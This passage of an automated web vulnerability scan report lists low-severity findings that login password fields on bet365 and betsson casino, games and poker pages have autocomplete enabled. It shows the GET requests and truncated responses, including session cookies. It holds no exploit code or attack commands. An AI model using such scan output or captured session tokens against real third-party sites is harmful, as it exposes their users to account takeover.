Content-Length: 86154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/blackjack/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.6. http://casino.bet365.com/extra/en/online-games/live-dealer

Summary

Severity:   Low
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/live-dealer

Issue detail

The page contains a form with the following action URL: /extra/en/online-games/live-dealer/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /extra/en/online-games/live-dealer HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bwkilnzzw312lbao5zygnc3u; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: session=stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 93559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/live-dealer/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.7. http://casino.bet365.com/extra/en/online-games/roulette

Summary

Severity:   Low
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /extra/en/online-games/roulette

Issue detail

The page contains a form with the following action URL: /extra/en/online-games/roulette/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /extra/en/online-games/roulette HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kcnaqt55ip33v1nmqm3ozt45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: session=stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 85710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/roulette/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.8. http://casino.bet365.com/home/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /home/en/

Issue detail

The page contains a form with the following action URL: /home/en/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:23 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5xuac3551kzj4cm3dpese255; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: session=stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 227712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true;} else
...[SNIP]...

13.9. https://casino.betsson.com/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://casino.betsson.com
Path:   /en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/ HTTP/1.1
Host: casino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:14:14 GMT
Connection: close
Content-Length: 161996


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.10. http://games.bet365.com/home/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://games.bet365.com
Path:   /home/en/

Issue detail

The page contains a form with the following action URL: /home/en/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:20 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jqaokq45oa00yd45k1sqtdbv; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: session=stk=7FFFF94400DA44DBABA668D6BF938444000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:19 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:02:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 338090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true;} else
...[SNIP]...

13.11. https://games.betsson.com/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://games.betsson.com
Path:   /en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/ HTTP/1.1
Host: games.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=0,pre-check=0, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60, post-check=15,pre-check=60
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:34:48 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:34:48 GMT
Connection: close
Content-Length: 161353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.12. https://livecasino.betsson.com/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://livecasino.betsson.com
Path:   /en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/ HTTP/1.1
Host: livecasino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:10:22 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:10:21 GMT
Connection: close
Content-Length: 44358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.13. http://poker.bet365.com/home/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://poker.bet365.com
Path:   /home/en/

Issue detail

The page contains a form with the following action URL: /home/en/Default.aspx. The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword.

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:32 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nyfxkkm5jpltjay123ux5555; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: session=stk=21BAFE3BE630423EA6F6F56A8ADE1FFB000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:20:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" />

<a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;); return true;} else
...[SNIP]...

13.14. https://poker.betsson.com/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://poker.betsson.com
Path:   /en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/ HTTP/1.1
Host: poker.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:13:27 GMT
Connection: close
Content-Length: 39393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.15. https://scratch.betsson.com/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/?navbar=true HTTP/1.1
Host: scratch.betsson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:45:00 GMT
Content-Length: 160229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.16. https://scratch.betsson.com/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/ HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:30 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:30 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:30 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:29 GMT
Connection: close
Content-Length: 160230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.17. https://scratch.betsson.com/en/Casino

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:37 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:37 GMT
Connection: close
Content-Length: 102596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.18. https://scratch.betsson.com/en/Casino/Bingo-Bonanza

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Bingo-Bonanza

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Bingo-Bonanza HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:29 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.19. https://scratch.betsson.com/en/Casino/Bubble-Bingo

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Casino/Bubble-Bingo

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (the action attribute value shown in the response below)
The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /en/Casino/Bubble-Bingo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
